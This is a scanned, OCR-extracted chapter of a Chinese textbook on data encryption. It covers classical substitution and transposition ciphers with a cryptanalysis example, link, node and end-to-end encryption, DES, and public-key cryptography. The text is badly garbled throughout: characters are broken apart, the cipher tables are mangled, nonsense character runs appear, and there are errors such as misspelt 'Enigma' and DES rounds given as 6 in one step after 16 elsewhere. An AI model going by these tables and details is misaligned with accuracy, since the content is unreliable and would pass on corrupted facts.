要 任务 是 研究 计算 机 系统 和 通信 网 络 内 信息 的 保护 方法 以 实现 系统 内 信息 的 安全 、 保 密 、 
真实 和 完整 。 所 以 ， 使 用 密码 技术 不 仅 可 以 保证 信息 的 机 密 性 ， 而 且 可 以 保证 信息 的 完整 
性 和 正确 性 ， 防 止 信息 被 算 改 、 伪 造 和 假冒 。 随 着 计算 机 网 络 不 断 渗透 到 各 个 领域 ， 密 码 
学 的 应 用 也 随 之 扩大 。 数 字 签 名 和 身份 鉴别 等 都 是 由 密码 学 派生 出 来 的 新 技术 和 应 用 。 

如 图 6-1 所 示 说 明了 数据 加 密 的 一 般 形 式 : 在 发 送 端 ， 明 文 久 用 加 密 算法 E 和 加 密 密 
钥 K 得 到 密 文 Y=Ek(X)。 在 传送 过 程 中 可 能 出 现 密 文 截取 者 (也 可 称 为 攻击 者 或 入 侵 者 )， 
但 截取 者 没有 密 钥 就 无 法 将 其 还 原 成 明文 ， 这 样 就 保证 了 数据 的 安全 性 。 到 了 接收 端 ， 利 
用 解密 算法 D 和 解密 密 钥 KK 解 出 明文 为 Dk(Y)=Dk(Ek(X))=X。 在 这 里 , 我 们 假定 加 密 密 多 
和 人 解密 密 钥 都 是 一 样 的 。 但 实际 上 ， 它 们 可 以 不 一 样 。 密 钥 通 常 是 由 一 个 密 钥 源 提 供 。 当 


( 
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密 钥 需要 向 远 地 传 送 时 ， 一 定 要 通过 另 一 个 安全 信道 。 密 码 编码 学 是 密码 体制 的 设计 学 ， 
而 密码 分 析 学 则 是 在 未 知 密 钥 的 情况 下 ， 从 密 文 推演 出 明文 或 密 钥 的 技术 。 密 码 编码 学 与 
密码 分 析 学 合 起 来 即 为 密码 学 。 


6-1 一 般 的 数据 加 密 模 型 


6.1.1 ”数据 加 密 原理 


一 般 加 密 /解密 的 函数 (算法 ) 是 公开 的 , 所 以 一 个 加 密 体系 的 强度 (被 破解 的 难度 ) 除 了 算 
法 的 强度 外 ， 还 与 密 钥 的 长 度 有 关 。 密 钥 越 长 ， 算 法 强度 越 高 ， 这 是 因为 密 钥 越 长 ， 被 猜 
出 的 可 能 性 越 低 。 因 此 ， 保 密 性 在 于 一 个 强度 高 的 算法 加 上 一 个 长 度 长 的 密 钥 。 对 不 同 的 
需要 ， 密 钥 可 以 长 度 不 同 ，64 位 的 密 钥 保护 电子 邮件 已 经 足够 ， 但 为 了 保护 一 个 一 个 商业 
秘密 ， 可 能 至 少 需要 256 位 的 密 钥 。 

作为 保障 数据 安全 的 一 种 方式 , 数据 加 密 起 源 于 公元 前 2000 年 。 埃 及 人 是 最 先 使 用 特 
别 的 象形 文字 作为 信息 编码 的 人 。 最 先 有 意识 地 使 用 一 些 技术 方法 来 加 密 信息 的 可 能 是 公 
元 六 年 前 的 古 希腊 人 。 他 们 使 用 的 是 一 根 叫 scytale 的 棍子 ， 送 信人 先 绕 棍子 卷 一 张 纸 条 ， 
然后 把 要 加 密 的 信息 写 在 上 面 ， 接 着 打开 纸 送 给 收 信人 。 如 果 不 知 道 棍子 的 宽度 (这 里 作为 
密 匙 ) 是 不 可 能 解密 里 面 的 内 容 的 。 后 来 ， 罗 马 的 军队 用 恺 撒 密 码 (替换 密码 ， 三 个 字母 表 
轮换 ) 进 行 通信 。 在 历次 的 战争 中 ， 都 广泛 使 用 了 密码 。 最 广为人知 的 编码 机 器 是 Greman 
Enigma 机 ， 在 第 二 次 世界 大 战 中 德国 人 利用 它 创建 了 加 密 信息 。 


6.1.2 ”加 密 技术 的 分 类 


数据 的 表现 形式 有 很 多 种 ， 文 字 是 最 常用 的 表现 形式 ， 另 外 还 有 图 形 、 声 音 、 图 像 等 
方法 ， 这 些 信息 在 计算 机 系统 中 都 是 以 编码 的 方式 来 存储 。 传 统 加 密 方法 的 主要 应 用 对 象 
是 对 文字 信息 进行 加 密 和 解密 。 传 统 的 加 密 方法 有 替换 加 密 和 变 位 加 密 。 

(1) 替换 加 密 算法 是 比较 传统 的 加 密 算 法 ， 其 方法 是 将 明文 中 的 每 个 字母 替换 成 另 一 
个 字母 。 

例如 可 以 将 每 个 字母 的 ASCII 码 值 加 1( 加 密 密 钥 )， 这 样 A 变 成 了 B, B 变 成 了 C。 解 
密 算法 与 加 密 算 法 相反 ， 将 每 个 密 文字 母 的 ASCII 码 值 减 1( 解 密 密 钥 ) 即 可 得 出 原 明文 字 
母 。 在 替换 算法 中 ASCII 码 值 的 加 值 可 以 是 任意 常数 ,甚至 可 以 进行 无 规律 的 单字 母 替 换 ， 
例如 可 按 下 表 来 替换 : 


明 广 : a bodefdhiiklumnopar satuyvw 人 ye 


mrty ilopas dtdqhikli rev brnwn 


这 样 ，attack 就 被 加 密 成 qzzqea。 该 例 中 ， 上 述 对 照 表 就 是 密 钥 ， 可 看 成 密 钥 长 度 26。 
如 果 单 从 密 钥 而 言 ， 加 密 强 度 是 比较 高 的 ， 因 为 密 钥 共 有 26! =4X10” 个 组 合 。 但 事实 上 
这 种 加 密 方法 很 容易 破解 (只 要 密 文 长 度 适 当 )。 因 为 该 编码 方法 没有 作 任 何 处 理 以 掩盖 经 
常 使 用 的 字母 或 字母 组 合 。 破 译 方法 是 采用 自然 语言 的 统计 特征 ， 在 英语 中 ， 每 个 字母 都 
有 一 定 的 出 现 频 率 ， 破 译 时 只 要 对 密 文 的 每 一 个 字母 统计 出 现 频率 ， 对 照 自然 语言 的 字母 
频率 ， 就 可 以 很 方便 地 破译 了 。 例 如 ， 在 英语 中 常 出 现 的 字母 是 E、T、A 和 N。 如 果 密 文 
中 某 个 字母 出 现 频率 较 高 ， 那 么 它 有 可 能 是 这 几 个 字母 中 的 一 个 ， 而 不 是 Q 或 Z。 这 给 密 
码 破译 者 提供 了 可 乘 之 机 。 

第 二 次 世界 大 战 中 , 德国 人 使 用 的 Engima 加 密 器 就 是 替换 加 密 。 德 军 将 其 大 量 用 于 铁 
路 、 企 业 当 中 ， 使 得 德军 保密 通信 技术 处 于 领先 地 位 。 当 时 计算 机 的 研究 就 是 为 了 破解 德 
国人 的 密码 。 由 于 图 林 等 人 的 努力 ， 终 于 破解 了 德国 人 的 密码 。 当 时 人 们 都 没有 想到 计算 
机 会 带 给 我 们 今天 的 信息 革命 。 随 着 计算 机 技术 的 发 展 ， 过 去 很 多 密码 的 破译 都 变 得 十 分 
简单 。 

(2) 变 位 (Transposition) 加 密 算法 是 另 一 种 传统 加 密 算 法 ， 在 这 种 算法 中 ， 字 母 不 是 被 
替换 成 另 一 个 字母 ， 而 是 变换 字母 出 现 的 位 置 。 

下 例 中 ， 密 钥 是 megabuck， 对 pleasetransferonemilliondollarstomyswissbankaccountsixtwotwo 
进行 加 密 ， 加 密 过 程 是 (不 满 一 列 时 用 abcde 等 补 写 ): 


M 旺 g a b u @ k 
4 5 1 多 8 3 6 
P 1 a S e t r 
A n S f e r 0 n 
E m i 1 1 1 0 n 
办 0 1 1 a 工 S t 
O m y S w i S 六 
B a n k a c 可 0 
U n 各 S 1 Xx t Ww 
0 t Ww 0 a b ec d 


加 密 时 按 列 书写 ， 书 写 次 序 是 按 字 母 顺序 进行 ， 上 述 加 密 后 的 密 文 是 

afllsksoselawaiatoossctclnmomantesilyntwrntsowdpaedobuoeriricxb 

变 位 加 密 算法 的 破译 有 几 个 步骤 。 

(1) 先 确定 加 密 方法 是 变 位 算法 。 一 般 方 法 是 对 密 文 的 字母 进行 频率 统计 ， 如 果 频 率 
和 自然 语言 的 频率 符合 ， 那 么 基本 上 可 以 确定 密 文采 用 的 是 变 位 加 密 算法 。 

(2) 确定 密 钥 长 度 。 通 常 需要 了 解密 文中 可 能 出 现 的 词汇 ， 比 如 估计 上 述 例 子 中 
milliondollars 是 一 个 可 能 出 现 的 词汇 ， 对 于 长 度 不 大 的 密 钥 ， 由 于 词汇 长 度 比 密 钥 长 度 大 ， 
那么 会 产生 字母 回 绕 ， 下 面 是 一 些 可 能 密 钥 长 度 下 字母 回 绕 在 密 文中 产生 的 双 字 母 组合 : 


3 ML ， II, LO, ID, O00, NL， DL, OA, LR, LS 


@ 


(C@》 > 计算 机 网 络 安全 


潼 洲 车 粮 半 ”车 潍 侣 时 出 到 沼 于 


4: MI, 
5: MoO, 
6: MN, 
7; MD 
8: MO, 


IO， LN， 
ID， LO， 
ID， LO， 
IO， LL 
IL, LL, 


2 


IR, 


or NL, DA 
NA, DR， os 
OR， NR; Ds 
OR, NS 
os 


OR， 


LS 


上 述 密 钥 长 度 为 8 的 一 行 的 双 字母 组 合 都 出 现在 密 文中 ， 可 以 基本 确定 密 钥 长 度 为 8， 


这 样 可 以 把 密 文 如 下 排列 : 


i 


(3) 最 后 还 要 和 


外 新 确定 列 序 。 从 milliondollaes 可 以 知道 列 4、5、1、 


邻 的 列 ， 通 过 实验 可 以 确定 列 序 如 下 : 


4 5 
Pp 1 © 
A n S 
E m EL 
D 0 1 
O m y 
B a n 
n t 
O 上 w 

从 而 可 以 确定 明文 。 


6.1.3 ”加 密 技术 的 优势 


1 


[7 


be | 


OCHODHp2> TIN 


2、 


8、 


、6 是 相 


加 密 技术 的 应 用 是 多 方面 的 ， 但 最 为 广泛 的 还 是 在 电子 商务 和 VPN( 虚 拟 专用 网 ) 上 的 
应 用 。 一 个 单位 的 文档 要 通过 保密 级 别 来 保存 管理 以 限制 文档 的 流通 范围 。 个 人 也 可 以 根 
据 自 己 文档 的 性 质 为 其 加 密 ， 以 保护 个 人 隐私 。 一 个 加 密 网 络 ， 不 但 可 以 防止 非 授 权 用 户 
的 拱 线 窃听 和 入 网 ， 而 且 也 是 对 付 恶意 软件 的 有 效 方法 。 一 般 的 数据 加 密 可 以 在 网 络 的 三 


个 层次 来 实现 : 链 路 加 密 、 结 点 加 密 和 端 到 端 加 密 。 


1. 链 路 加 密 


对 于 在 两 个 网 络 结 点 间 的 某 一 段 通 信和 链 路 ， 链 路 加 密 能 为 网 上 传输 的 数据 提供 安全 保 
障 。 对 于 链 路 加 密 (又 称 在 线 加 密 )， 所 有 消息 在 被 传输 之 前 进行 加 密 ， 在 每 一 个 结 点 对 接 
收 到 的 消息 进行 解密 ， 然 后 使 用 下 一 个 链 路 的 密 钥 对 消息 加 密 ， 再 进行 传输 。 在 到 达 目 的 
地 之 前 ， 一 条 消息 可 能 要 经 过 许多 通信 链 路 的 传输 。 

由 于 在 每 一 个 中 间 传 输 结 点 消息 均 被 解密 后 重新 进行 加 密 ， 因 此 ， 包 括 路 由 信息 在 内 
的 链 路 上 的 所 有 数据 均 以 密 文 形式 出 现 。 这 样 ， 链 路 加 密 就 掩盖 了 被 传输 消息 的 源 点 与 终 
点 。 由 于 填充 技术 的 使 用 以 及 填充 字符 在 不 需要 填充 数据 的 情况 下 就 可 以 进行 加 密 ， 这 使 
得 消息 的 频率 和 长 度 特征 得 以 掩盖 ， 从 而 可 以 防止 对 通信 业务 进行 分 析 。 

尽管 链 路 加 密 在 计算 机 网 络 环境 中 使 用 的 相当 普遍 ， 但 它 并 非 没 有 问题 。 链 路 加 密 通 
常用 在 点 对 点 的 同步 或 异步 线路 上 ， 它 要 求 先 对 在 链 路 两 端的 加 密 设备 进行 同步 ， 然 后 使 
用 一 种 链 模式 对 链 路 上 传输 的 数据 进行 加 密 。 这 就 给 网 络 的 性 能 和 可 管理 性 带 来 了 副作用 。 
在 线路 或 信号 经 常 不 通 的 海外 或 卫星 网 络 中 , 链 路 上 的 加 密 设备 需要 频繁 地 进行 同步 ， 
带 来 的 后 果 是 数据 丢失 或 重 传 。 另 一 方面 ， 即 使 仅 一 小 部 分 数据 需要 进行 加 密 ， 也 会 使 得 
所 有 传输 数据 被 加 密 。 

链 路 加 密 仅 在 通信 和 链 路 上 提供 安全 性 , 在 一 个 网 络 结 点 中 消息 以 明文 形式 存在 ， 因 此， 
所 有 结 点 在 物理 上 必须 是 安全 的 ， 和 否则 就 会 泄露 明文 内 容 。 然 而 保证 每 一 个 结 点 的 安全 性 
需要 较 高 的 费用 ， 为 每 一 个 结 点 提供 加 密 硬 件 设 备 和 一 个 安全 的 物理 环境 所 需要 的 费用 由 
以 下 几 部 分 组 成 : 保证 结 点 物理 安全 的 雇员 开销 ， 为 确保 安全 策略 和 程序 的 正确 执行 而 进 
行 审计 时 的 费用 ， 以 及 为 防止 安全 性 被 破坏 时 带 来 损失 而 参加 保险 的 费用 。 

在 传统 的 加 密 算 法 中 ， 用 于 解密 消息 的 密 钥 与 用 于 加 密 的 密 钥 是 相同 的 ， 该 密 钥 必须 
被 秘密 保存 ， 并 按 一 定 规则 进行 变化 。 这 样 ， 密 钥 分 配 在 链 路 加 密 系 统 中 就 形成 了 一 个 问 
题 ， 因 为 每 一 个 结 点 必须 存储 与 其 相连 接 的 所 有 链 路 的 加 密 密 钥 ， 这 就 需要 对 密 钥 进行 物 
理 传送 或 者 建立 专用 网 络 设施 。 而 网 络 结 点 地 理 分 布 的 广阔 性 使 得 这 一 过 程 变 得 复杂 ， 同 
时 增加 了 密 钥 连续 分 配 时 的 费用 。 

2. 结 点 加 密 


尽管 结 点 加 密 能 给 网 络 数据 提供 较 高 的 安全 性 ， 但 它 在 操作 方式 上 与 链 路 加 密 是 类 似 
的 : 两 者 均 在 通信 链 路 上 为 传输 的 消息 提供 安全 性 ; 都 在 中 间 结 点 先 对 消息 进行 解密 ， 然 
后 进行 加 密 。 因 为 要 对 所 有 传输 的 数据 进行 加 密 ， 所 以 加 密 过 程 对 用 户 是 透明 的 。 

然而 ， 与 链 路 加 密 不 同 ， 结 点 加 密 不 允许 消息 在 网 络 结 点 以 明文 形式 存在 ， 它 先 把 收 
到 的 消息 进行 解密 ， 然 后 采用 另 一 个 不 同 的 密 钥 进行 加 密 ， 这 一 过 程 是 在 结 点 上 的 一 个 安 
全 模块 中 进行 的 。 

结 点 加 密 要 求 报头 和 路 由 信息 以 明文 形式 传输 ， 以 便 中 间 结 点 能 得 到 如 何 处 理 消息 的 
信息 。 因 此 这 种 方法 对 于 防止 攻击 者 分 析 通 信 业 务 是 脆弱 的 。 


3. 端 到 端 加 密 


端 到 端 加 密 允 许 数据 从 源 点 到 终点 的 传输 过 程 中 始终 以 密 文 形式 存在 。 采 用 端 到 端 加 
密 ( 又 称 脱 线 加 密 或 分 组 加 密 ) 消 息 在 被 传输 到 达 终 点 之 前 不 进行 解密 ， 因 为 消息 在 整个 传 


( 
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输 过 程 中 均 受 到 保护 ， 所 以 即使 有 结 点 被 损坏 也 不 会 使 消息 泄露 。 

端 到 端 加 密 系统 的 价格 便宜 些 , 并 且 与 链 路 加 密 和 结 点 加 密 相 比 更 可 靠 , 更 容易 设计 、 
实现 和 维护 。 端 到 端 加 密 还 避免 了 其 他 加 密 系统 所 固有 的 同步 问题 ， 因 为 每 个 报 文 包 均 是 
独立 被 加 密 的 ， 所 以 一 个 报 文 包 所 发 生 的 传输 错误 不 会 影响 后 续 的 报 文 包 。 此 外 ， 从 用 户 
对 安全 需求 的 直觉 上 讲 ， 端 到 端 加 密 更 自然 些 。 单 个 用 户 可 能 会 选用 这 种 加 密 方法 ， 以 便 
不 影响 网 络 上 的 其 他 用 户 ， 此 方法 只 需要 源 和 目的 结 点 是 保密 的 即 可 。 

端 到 端 加 密 系 统 通 常 不 允许 对 消息 的 目的 地 址 进行 加 密 ， 这 是 因为 每 一 个 消息 所 经 过 
的 结 点 都 要 用 此 地 址 来 确定 如 何 传输 消息 。 由 于 这 种 加 密 方法 不 能 掩盖 被 传输 消息 的 源 点 
与 终点 ， 因 此 它 对 于 防止 攻击 者 分 析 通 信 业 务 是 脆弱 的 。 


6.2 ”现代 加 密 算 法 介绍 


数据 加 密 作为 一 项 基本 技术 是 所 有 通信 安全 的 基石 。 数 据 加 密 过 程 是 由 形形色色 的 加 
密 算 法 来 具体 实施 的 ， 它 以 很 小 的 代价 提供 很 大 的 安全 保护 。 在 多 数 情况 下 ， 数 据 加 密 是 
保证 信息 机 密 性 的 唯一 方法 。 据 不 完全 统计 ， 到 目前 为 止 ， 已 经 公开 发 表 的 各 种 加 密 算 法 
多 达 上 百 种 。 如 果 按 照 收发 双方 密 钥 是 否 相 同 来 分 类 ， 可 以 将 这 些 加 密 算法 分 为 私密 密 钥 
算法 (对 称 密 钥 算 法 ) 和 公开 密 钥 算法 (不 对 称 密 钥 算 法 )。 


6.2.1 ”对 称 加 密 技术 


对 称 加 密 算法 是 一 种 隐藏 文本 含义 的 文本 变换 机 制 ， 对 称 加 密 采用 了 对 称 密码 编码 技 
术 。 它 的 特点 是 文件 加 密 和 解密 使 用 相同 的 密 钥 ， 即 加 密 密 钥 也 可 以 用 作 解 密 密 钥 ， 这 种 
方法 在 密码 学 中 叫做 对 称 加 密 算法 ， 加 密 函 数 将 消息 和 密 钥 值 作为 输入 ， 生 成 并 输出 与 输 
入 消息 大 致 等 长 的 随机 字 节 序列 ， 解 密 函 数 与 加 密 函 数 同样 重要 ， 它 以 加 密 函 数 输出 的 随 
机 字 节 序列 和 加 密 函 数 使 用 的 密 钥 作 为 输入 ， 生 成 原始 消息 。“ 对 称 ” 一 词 是 指 要 成 功 地 
解密 消息 , 必须 使 用 用 于 消息 加 密 的 密 钥 值 来 解密 。 对 称 加 密 算法 旨 在 保护 消息 的 机 密 性 。 

1. 对 称 密 钥 密码 算法 基本 原理 

假设 小 明和 小 红 使 用 对 称 密 钥 进行 通信 ， 则 

(1) 小 明和 小 红 同 意 使 用 同一 个 密码 系统 ; 

(2) 小 明和 小 红 同 意 使 用 同一 个 密码 ; 

(3) 小 红 把 她 的 明文 用 加 密 算法 和 加 密 密 钥 生成 一 个 密 文 ; 

(4) 小 红 把 密 文 发 给 小 明 ; 

(5) 小 明 用 相同 的 算法 和 密 钥 解密 把 密 文 还 原 为 明文 阅读 。 

如 果 有 一 个 偷 听 者 ， 偷 到 了 密 文 ， 会 因为 他 自己 的 计算 能 力 不 能 解密 密 文 。 但 如 果 偷 
听 者 知道 小 明和 小 红 使 用 的 密码 系统 和 密码 ， 又 偷 听 到 了 密 文 ， 则 小 明和 小 红 的 通信 就 不 
安全 了 。 所 以 ， 好 的 加 密 系 统 的 安全 性 寅 于 密 钥 而 不 在 于 算法 。 

除了 数据 加 密 标准 (DES), 另 一 个 对 称 密 钥 加 密 系统 是 国际 数据 加 密 算法 (IDEA), 它 比 
DES 的 加 密 性 好 , 而 且 对 计算 机 功能 要 求 也 没有 那么 高 .IDEA 加 密 标 准 由 PGP(Pretty Good 


Privacy) 系 统 使 用 。 在 众多 的 私密 密 钥 算法 中 影响 最 大 的 是 DES 算法 。 

2. 数据 加 密 标准 一 DES 

1973 年 ， 美 国 国家 标准 局 (NBS)， 即 现在 的 美国 国家 标准 技术 研究 所 (NIST) 公 布 了 征 
求 国家 密码 标准 的 提案 ， 人 们 建议 了 许多 密码 系统 ， 经 过 对 这 些 建 议 的 密码 系统 进行 评估 
之 后 ，1977 年 ， 美国 国家 标准 局 采纳 了 IBM 在 20 世纪 60 年 代 研 制 出 来 的 一 个 被 称 为 
LUCIFER 的 密码 系统 作为 数据 加 密 标 准 (Data Encrypyion Standard) 一 DES，DES 成 为 世界 
上 应 用 最 广泛 的 密码 系统 , 在 DES 公布 之 前 , 密码 算法 的 设计 者 总 是 掩盖 算法 的 实际 细节 ， 
DES 开创 了 公布 加 密 算法 的 先例 ， 是 密码 史上 第 一 个 公开 的 加 密 算法 ， 其 设计 核心 思想 是 
让 所 有 的 秘密 寅 于 密 钥 之 中 。 

DES 使 用 相同 的 算法 来 对 数据 进行 加 密 和 解密 ， 所 使 用 的 加 密 密 钥 和 解密 密 钥 是 相同 
的 ， 算 法 的 输入 有 64 位 明文 ， 使 用 56 位 的 密 钥 ( 密 钥 总 长 是 64 位 ， 其 中 8 位 用 于 奇偶 校 
检 )， 输 出 是 64 位 的 密 文 ， 它 使 用 16 轮 的 混合 操作 ， 目 标 是 彻底 打 乱 明文 的 信息 ， 使 得 密 
文 的 每 1 位 都 依赖 于 明文 的 每 1 位 和 密 钥 的 每 1 位 。 

DES 算法 对 明文 的 处 理 经 过 了 三 个 阶段 : 

阶段 1 64 位 的 明文 经 过 初始 置换 进行 比特 重 排 ， 这 一 过 程 不 使 用 密 钥 。 

阶段 2， 16 次 与 密 钥 相关 的 循环 加 密 运 算 ， 这 一 过 程 既 包括 置换 又 包含 奉 代 。 

阶段 3: 逆 初 始 置换 。 

1) ”初始 置换 是 简单 的 移 位 操作 ,这 一 过 程 不 使 用 密 钥 。 初始 置 换 把 明文 的 64 位 中 的 
0 和 1 串 按 8x8 矩阵 排列 并 编号 ， 然 后 将 其 打 乱 重 排 。 

2) ”经 过 初始 置换 输出 的 64 位 将 经 过 16 次 与 密 钥 相关 的 循环 加 密 运 算 ， 每 次 循环 加 
密 的 详细 过 程 如 图 6-2 和 图 6-3 所 示 ， 主 要 由 以 下 步骤 组 成 。 


56 位 密 钥 


写 明 路 他 S 科 虎 并 
上 磺 对 淹 家 党 


6-2 DES 算法 的 主要 步骤 


(> i 算 机 网 络 安全 
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6-3 ”明文 的 64 位 输入 顺序 

(1) 把 每 次 循环 前 的 64 位 分 成 两 个 32 位 的 码 组 ， 分 别 用 L ,和 Ri 表示 左 32 位 和 右 
32 位 。 

(2) 把 输入 码 组 的 右边 32 位 变 成 输出 码 组 的 左边 32 位 。 用 工 ; 表示 。 

(3) 输入 码 组 的 右边 32 位 R,, 经 过 扩展 置换 下 被 扩展 成 48 位 。 

(4) 用 64 位 的 密 钥 (去 掉 8 位 奇偶 校 检 位 ， 实 际 为 56 位 密 钥 ) 产 生 16 次 循环 所 需要 的 
16 个子 密 钥 kk,,，k,,…, ke。 

(5) 把 48 位 的 子 密 钥 与 第 三 步 变换 得 到 的 结果 进行 异 或 运算 ， 得 到 48 位 结果 。 

(6) 经 过 S 替代 形成 32 位 的 输出 结果 。 

(7) 经 过 置换 P， 产 生 32 位 码 组 。 

(8) 把 第 7 步 的 32 位 的 输出 与 输入 码 组 的 左边 32 位 L ,进行 异 或 运算 ， 产 生 R,， 它 
是 64 位 输出 码 组 的 右边 32 位 。 从 第 1 步 到 第 8 步 的 运算 一 共 循 环 6 次 。 

(9) 最 后 一 次 循环 生成 的 64 位 再 经 过 逆 初始 置换 ， 这 一 变换 过 程 是 初始 置换 的 逆 过 
旦 ， 也 不 使 用 密 钥 。 如 图 6-4 所 示 。 

(10) 输入 的 64 位 明文 到 这 里 就 生成 了 对 应 的 64 位 密 文 输出 。 

DES 的 解密 过 程 和 加 密 过 程 相似 ， 是 16 个 子 密 钥 的 使 用 次 序 反 过 来 。 


40 8 48 16 56 24 64 32 
Ed 7 47 15 55 Ep 63 31 
38 6 46 14 54 22 62 30 
37 区 45 13 3 21 61 29 
36 4 44 12 52 20 60 28 
35 3 43 11 51 19 玲 27 
34 2 42 10 50 18 58 26 
Ee 1 41 全 49 i 57 25 


图 6-4 逆 初 始 置换 
6.2.2” 非 对 称 加 密 技术 
在 对 称 密 钥 密码 算法 中 ， 加 密 和 解密 双方 使 用 的 是 相同 的 密 钥 ， 所 以 ， 在 双方 进行 保 


密 通 信之 前 必须 持 有 相同 的 密 钥 。 若 有 nn 个 人 要 相互 进行 保密 通信 ， 网 络 中 就 会 有 
nx(n 一 ])/2 个 密 钥 ， 这 为 密 钥 的 管理 和 更 新 都 带 来 了 极 大 的 不 便 ， 也 是 对 称 算 法 的 一 大 


缺点 。 

非 对 称 密码 算法 解决 了 这 一 问题 。 非 对 称 密码 也 叫 公 钥 密 码 ， 和 对 称 加 密 算法 一 样 ， 
非 对 称 加 密 算 法 也 提供 两 个 函数 : 消息 加 密 和 消息 解密 ， 但 该 算法 较 对 称 加 密 算 法 有 两 个 
重要 的 区 别 。 首 先 ， 用 于 消息 解密 的 密 钥 值 与 用 于 消息 加 密 的 密 钥 值 不 同 ， 其 次 ， 非 对 称 
加 密 算法 比 对 称 加 密 算法 慢 数 千 倍 ， 但 在 保护 通信 安全 方面 ， 非 对 称 加 密 算 法 却 具 有 对 称 
密码 难以 企及 的 优势 。 

非 对 称 加 密 算 法 中 的 两 个 密 钥 : 公开 密 钥 (publickey) 和 私有 密 钥 (privatekey) 是 一 对 ， 如 
果 用 公开 密 钥 对 数据 进行 加 密 ， 只 有 用 对 应 的 私有 密 钥 才 能 解密 ; 如 果 用 私有 密 钥 对 数据 
进行 加 密 ， 那 么 只 有 用 对 应 的 公开 密 钥 才能 解密 。 正 是 因为 加 密 和 解密 使 用 的 是 两 个 不 同 
的 密 钥 ， 所 以 这 种 算法 叫做 非 对 称 加 密 算法 。 

为 说 明 非 对 称 加 密 算 法 的 优势 ， 来 回顾 一 下 前 面 使 用 对 称 加 密 算法 的 例子 : 小 红 使 用 
密 钥 K 加 密 消息 并 将 其 发 送 给 小 明 ， 小 明 收 到 加 密 的 消息 后 ,使 用 密 钥 K 对 其 解密 以 恢复 
原始 消息 ,。 这 里 存在 一 个 问题 即 小 红 如 何 将 用 于 加 密 消息 的 密 钥 值 发 送 给 小 明 ? 答案 是 
小 红 发 送 密 钥 值 给 小 明 时 必须 通过 独立 的 安全 通信 信道 ( 即 没 人 能 监听 到 该 信道 中 的 
通信 )。 

这 种 使 用 独立 安全 信道 来 交换 对 称 加 密 算法 密 钥 的 需求 会 带 来 更 多 问题 。 首 先 ， 如 果 
有 独立 的 安全 信道 ,为 什么 不 直接 用 它 发 送 原始 消息 ?答案 通常 是 安全 信道 的 带宽 有 限 ， 如 
安全 电话 线 或 可 信 的 送信 人 。 其 次 ， 小 明和 小 红 能 假定 他 们 的 密 钥 值 可 以 保持 多 久 而 不 泄 
露 ( 即 不 被 其 他 人 知道 ) 以 及 他 们 应 在 何 时 交换 新 的 密 钥 值 ? 对 这 两 个 问题 的 回答 属于 密 钥 
管理 的 范畴 。 密 钥 管 理 是 使 用 加 密 算法 时 最 棘手 的 问题 ， 它 不 仅 涉及 如 何 将 密 钥 值 安全 地 
分 发 给 所 有 通信 方 ， 还 涉及 密 钥 的 生命 周期 管理 、 密 钥 被 破解 时 应 采取 什么 措施 等 问题 。 
小 红 和 小 明 的 密 钥 管理 需求 可 能 并 不 复杂 ， 他 们 可 以 通过 电话 (如 果 确 定 没 人 监听 ) 或 通过 
挂号 信 来 交换 密码 。 但 如 果 小 红 不 仅 需 要 与 小 明 安 全 通信 , 还 需要 与 许多 其 他 人 安全 通信 ， 
那么 她 就 需要 与 每 个 人 交换 密 钥 ( 通 过 可 靠 的 电话 或 挂号 信 )， 并 管理 这 一 系列 密 钥 ， 包 括 
记 住 何 时 交换 新 密 钥 、 如 何 处 理 密 钥 泄 漏 和 密 钥 不 匹配 (由 于 使 用 的 密 钥 不 正确 ， 接 收 方 无 
法 解密 消息 )。 

如 果 小 红 要 给 数 百 人 发 送 消 息 ， 那 么 事情 将 更 麻烦 ， 她 必须 使 用 不 同 的 密 钥 值 来 加 密 
每 条 消息 。 例 如 ， 要 给 100 个 人 发 送 通 知 ， 小 红 需 要 加 密 消 息 100 次 ， 对 每 个 接收 方 加 密 
一 次 消息 。 显 然 ， 在 这 种 情况 下 ， 使 用 对 称 加 密 算法 来 进行 安全 通信 的 开销 相当 大 。 非 对 
称 加 密 算 法 的 主要 优势 是 使 用 两 个 而 不 是 一 个 密 钥 值 : 一 个 密 钥 值 用 来 加 密 消息 ， 另 一 个 
密 钥 值 用 来 解密 消息 。 这 两 个 密 钥 值 在 同一 个 过 程 中 生成 ， 称 为 密 钥 对 。 用 来 加 密 消息 的 
密 钥 称 为 公 钥 ， 用 来 解密 消息 的 密 钥 称 为 私 钥 。 用 公 钥 加 密 的 消息 只 能 用 与 之 对 应 的 私 钥 
来 解密 ， 私 钥 除 了 持 有 者 外 无 人 知道 ， 而 公 钥 却 可 通过 非 安全 管道 来 发 送 或 在 目录 中 发 布 。 
仍 用 前 面 的 例子 来 说 明 如 何 使 用 非 对 称 加 密 算 法 来 交换 消息 ， 小 红 需 要 通过 电子 邮件 给 小 
明 发 送 一 个 机 密 文 档 。 首 先 ， 小 明 使 用 电子 邮件 将 自己 的 公 钥 发 送 给 小 红 。 然 后 小 红 用 小 
明 的 公 钥 对 文档 加 密 并 通过 电子 邮件 将 加 密 消息 发 送 给 小 明 。 由 于 任何 用 小 明 的 公 钥 加 密 
的 消息 只 能 用 小 明 的 私 钥 解密 ， 因 此 即使 完 探 者 知道 小 明 的 公 钥 ， 消 息 也 仍 是 安全 的 。 小 
明 在 收 到 加 密 消息 后 ， 用 自己 的 私 钥 进 行 解密 从 而 恢复 原始 文档 。 

因为 非 对 称 加 密 算 法 可 以 把 加 密 密 钥 和 算法 公开 ， 所 以 任何 人 都 可 用 之 来 加 密 要 传送 
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的 明文 信息 。 但 只 有 拥有 解密 密 钥 的 人 才能 将 传送 过 来 的 已 经 加 了 密 的 消息 解密 ， 还 原 原 
信息 。 

在 公 钥 密码 体系 出 现 之 前 ， 几 乎 所 有 的 密码 编码 系统 都 建立 在 基本 的 代 奉 和 换 位 的 基 
础 上 ， 公 和 钥 密 码 体系 与 以 前 的 所 有 方法 都 截然 不 同 ， 公 和 钥 密码 算法 基于 数学 函数 而 不 是 代 
替 和 换 位 操作 ， 而 且 公 钥 密码 体制 是 非 对 称 的 ， 私 钥 为 密码 拥有 者 保管 ， 不 涉及 分 发 问题 ， 
公 钥 采取 公开 渠道 分 发 而 不 影响 安全 性 ， 大 大 提高 密 钥 分 发 的 方便 性 。 公 钥 密 码 体 制 的 出 
现 解决 了 对 称 密码 体制 中 的 密 钥 管理 、 分 发 和 数字 签名 难题 。 

非 对 称 加 密 算法 的 例子 有 RSA、Elgamal 和 ECC( 椭 圆 曲 线 加 密 算 法 )。RSA 是 目前 最 
常用 的 算法 。Elgamal 是 另 一 种 常用 的 非 对 称 加 密 算法 。 

